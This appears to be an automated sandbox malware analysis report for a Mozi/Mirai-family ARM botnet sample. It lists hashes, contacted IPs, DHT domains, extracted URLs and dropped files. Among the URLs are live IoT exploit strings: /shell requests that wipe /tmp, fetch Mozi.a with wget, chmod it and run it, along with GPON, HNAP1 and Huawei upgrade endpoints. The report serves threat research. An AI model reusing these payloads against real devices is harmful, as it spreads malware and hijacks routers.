flash

MGuvcs6Ocz

Status: finished
Submission Time: 2021-04-25 20:58:13 +02:00
Malicious
Spreader
Trojan
Evader
Mirai

Details

  • Analysis ID:
    397466
  • API (Web) ID:
    697090
  • Analysis Started:
    2021-04-25 20:58:14 +02:00
  • Analysis Finished:
    2021-04-25 21:09:01 +02:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
  • Technologies:
System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Verdict | Score
malicious | 100/100
malicious | 41/60
malicious | 20/37
malicious | 20/29
malicious |

IPs

IP | Country | Detection
91.57.107.2 | Germany
153.157.9.172 | Japan
94.31.145.150 | Russian Federation
100.182.99.144 | United States
110.192.131.42 | China
207.67.91.44 | United States
74.18.244.100 | United States
130.68.74.157 | United States
13.219.81.91 | United States
157.46.152.22 | India
50.10.218.224 | United States
157.14.182.109 | Japan
172.42.40.243 | United States
16.98.151.230 | United States
49.0.203.86 | Mongolia
178.175.121.49 | Montenegro
8.195.49.95 | United States
135.233.240.19 | United States
163.246.109.119 | United States
3.146.148.144 | United States
219.47.162.234 | Japan
1.207.152.148 | China
132.204.24.45 | Canada
211.18.19.160 | Japan
61.231.92.160 | Taiwan; Republic of China (ROC)
65.173.118.23 | United States
43.245.138.132 | India
139.130.197.234 | Australia
138.40.6.32 | United Kingdom
175.159.188.41 | Hong Kong
57.211.14.243 | Belgium
86.104.41.235 | Iran (ISLAMIC Republic Of)
105.162.120.29 | Kenya
199.125.24.246 | United States
114.100.97.125 | China
157.245.145.71 | United States
119.197.149.98 | Korea Republic of
147.22.206.236 | United States
170.169.8.221 | Mexico
222.48.163.26 | China
117.151.233.14 | China
198.94.113.247 | United States
218.231.43.124 | Japan
196.90.229.151 | Morocco
114.182.18.144 | Japan
208.228.127.61 | United States
131.30.249.212 | United States
89.61.117.218 | Germany
159.0.138.11 | Saudi Arabia
9.20.231.34 | United States
219.15.149.67 | Japan
181.82.14.167 | Argentina
129.13.128.214 | Germany
31.135.20.186 | Poland
135.235.118.101 | United States
44.179.175.67 | United States
31.246.254.22 | Germany
129.61.62.75 | United States
115.145.240.169 | Korea Republic of
20.219.183.3 | United States
175.59.180.182 | China
174.166.171.113 | United States
167.116.31.50 | Uruguay
37.218.12.173 | Spain
4.147.62.142 | United States
98.117.217.106 | United States
9.119.216.229 | United States
50.18.249.52 | United States
105.23.11.84 | Mauritius
177.97.224.43 | Brazil
131.194.232.220 | United States
33.59.152.55 | United States
141.33.224.95 | Germany
113.189.251.248 | Viet Nam
81.165.231.66 | Belgium
219.215.91.164 | Japan
126.76.20.8 | Japan
134.125.107.194 | United States
172.92.207.39 | United States
181.20.57.55 | Argentina
85.65.154.68 | Israel
101.197.152.207 | China
217.211.238.79 | Sweden
221.34.98.191 | Japan
211.169.167.142 | Korea Republic of
114.36.89.87 | Taiwan; Republic of China (ROC)
58.189.27.210 | Japan
117.213.41.118 | India
179.67.135.130 | Brazil
189.52.247.3 | Brazil
187.212.113.5 | Mexico
44.9.1.20 | United States
120.98.233.8 | Taiwan; Republic of China (ROC)
169.208.248.210 | Korea Republic of
31.167.14.125 | Saudi Arabia
181.100.16.154 | Argentina
194.174.210.204 | Germany
165.81.92.196 | United States
85.140.136.230 | Russian Federation
117.196.107.209 | India

Domains

Name | IP | Detection
dht.transmissionbt.com | 87.98.162.88
bttracker.acc.umu.se | 130.239.18.159
router.bittorrent.com | 67.215.246.10
router.utorrent.com | 82.221.103.244
bttracker.debian.org | 0.0.0.0

URLs

Name Detection
http://%s:%d/bin.sh;chmod
http://23.207.67.88:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://79.171.18.106:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://154.90.79.101:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.76.236.93:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://185.29.123.11:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.40.37.31:80/HNAP1/
http://23.217.112.105:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:5555/UD/act?1
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://45.65.120.55:80/HNAP1/
http://127.0.0.1:80/GponForm/diag_Form?images/
http://81.7.8.12:80/HNAP1/
http://18.228.54.139:80/HNAP1/
http://157.245.223.131:80/HNAP1/
http://133.137.248.191:80/HNAP1/
http://%s:%d/bin.sh
http://146.158.12.4:80/HNAP1/
http://13.226.101.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://166.88.243.237:80/HNAP1/
http://154.201.250.66:80/HNAP1/
http://217.182.243.67:80/HNAP1/
http://99.192.234.217:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://168.184.43.22:37215/ctrlt/DeviceUpgrade_1
http://ipinfo.io/ip
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://www.pastebin.ca
http://purenetworks.com/HNAP1/
http://schemas.xmlsoap.org/soap/envelope/
http://www.alsa-project.org.
http://HTTP/1.1
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.a;chmod
http://pastebin.ca)
http://127.0.0.1sendcmd
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://%s:%d/Mozi.m
http://www.alsa-project.org/cardinfo-db/
http://schemas.xmlsoap.org/soap/encoding/
http://35.244.243.215:80/HNAP1/
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.pastebin.ca.
http://%s:%d/Mozi.a;sh$
http://%s:%d/Mozi.m;
http://www.alsa-project.org/alsa-info.sh

Dropped files

Name | File Type | Hashes | Detection
/etc/init.d/mountall.sh | ASCII text
/usr/bin/gettext.sh | ASCII text
/usr/networks | ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
/usr/sbin/alsa-info.sh | ASCII text, with very long lines
/etc/rcS.d/S95baby.sh | POSIX shell script, ASCII text executable
/etc/rc.local | ASCII text
/etc/profile.d/vte-2.91.sh | ASCII text
/etc/profile.d/cedilla-portuguese.sh | ASCII text
/etc/profile.d/bash_completion.sh | ASCII text
/etc/profile.d/apps-bin-path.sh | ASCII text
/etc/profile.d/Z97-byobu.sh | ASCII text
/etc/init.d/umountnfs.sh | ASCII text
/etc/init.d/mountnfs.sh | ASCII text
/etc/init.d/mountnfs-bootclean.sh | ASCII text
/etc/init.d/mountkernfs.sh | ASCII text
/etc/init.d/mountdevsubfs.sh | ASCII text
/etc/init.d/mountall-bootclean.sh | ASCII text
/etc/init.d/hwclock.sh | ASCII text
/etc/init.d/hostname.sh | ASCII text
/etc/init.d/checkroot.sh | ASCII text
/etc/init.d/checkroot-bootclean.sh | ASCII text
/etc/init.d/checkfs.sh | ASCII text
/etc/init.d/bootmisc.sh | ASCII text
/etc/init.d/S95baby.sh | POSIX shell script, ASCII text executable
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-whatchanged.sh | ASCII text
/usr/share/doc/git/contrib/fast-import/git-import.sh | ASCII text
/usr/share/doc/git/contrib/git-resurrect.sh | ASCII text
/usr/share/doc/git/contrib/remotes2config.sh | ASCII text
/usr/share/doc/git/contrib/rerere-train.sh | ASCII text
/usr/share/doc/git/contrib/subtree/git-subtree.sh | ASCII text
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-verify-tag.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-tag.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-revert.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-resolve.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-reset.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-repack.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-pull.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-notes.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-merge.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-merge-ours.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-ls-remote.sh | ASCII text
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh | ASCII text
/usr/share/doc/xdotool/examples/ffsp.sh | ASCII text
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh | ASCII text
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh | ASCII text
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh | ASCII text
/usr/share/doc/tmux/examples/bash_completion_tmux.sh | ASCII text
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh | ASCII text
/usr/share/doc/netcat-openbsd/examples/dist.sh | ASCII text
/usr/share/doc/mdadm/examples/mdadd.sh | ASCII text
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh | ASCII text
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh | ASCII text
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh | ASCII text
/usr/share/doc/ifupdown/examples/ping-places.sh | ASCII text
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh | ASCII text
/usr/share/doc/ifupdown/examples/get-mac-address.sh | ASCII text
/usr/share/doc/ifupdown/examples/check-mac-address.sh | ASCII text
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh | ASCII text
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh | ASCII text
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh | ASCII text
/etc/wpa_supplicant/functions.sh | ASCII text
/usr/share/cups/braille/indexv4.sh | ASCII text
/usr/share/cups/braille/indexv3.sh | ASCII text
/usr/share/cups/braille/index.sh | ASCII text
/usr/share/cups/braille/cups-braille.sh | UTF-8 Unicode text
/usr/share/brltty/initramfs/brltty.sh | ASCII text
/usr/share/alsa/utils.sh | ASCII text
/usr/share/alsa-base/alsa-info.sh | ASCII text, with very long lines
/tmp/.config | ASCII text
/etc/wpa_supplicant/ifupdown.sh | ASCII text
/usr/share/debconf/confmodule.sh | ASCII text
/etc/wpa_supplicant/action_wpa.sh | ASCII text
/etc/bash_completion.d/libreoffice.sh | ASCII text
/etc/acpi/undock.sh | ASCII text
/etc/acpi/tosh-wireless.sh | ASCII text
/etc/acpi/powerbtn.sh | ASCII text
/etc/acpi/ibm-wireless.sh | ASCII text
/etc/acpi/asus-wireless.sh | ASCII text
/etc/acpi/asus-keyboard-backlight.sh | ASCII text
/usr/share/doc/gdb/contrib/expect-read1.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-gc.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-fetch.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-commit.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-clone.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-clean.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-checkout.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-am.sh | OS/2 REXX batch file, ASCII text
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh | ASCII text
/usr/share/doc/gdb/contrib/gdb-add-index.sh | ASCII text
/usr/share/doc/git/contrib/examples/git-log.sh | ASCII text
/usr/share/doc/gdb/contrib/ari/gdb_find.sh | ASCII text
/boot/grub/i386-pc/modinfo.sh | ASCII text
/usr/share/doc/gawk/examples/prog/igawk.sh | awk or perl script, ASCII text
/usr/share/doc/gawk/examples/network/PostAgent.sh | ASCII text
/usr/share/doc/cron/examples/cron-tasks-review.sh | ASCII text
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh | ASCII text
/usr/share/doc/acpid/examples/default.sh | ASCII text
/usr/share/doc/acpid/examples/ac.sh | ASCII text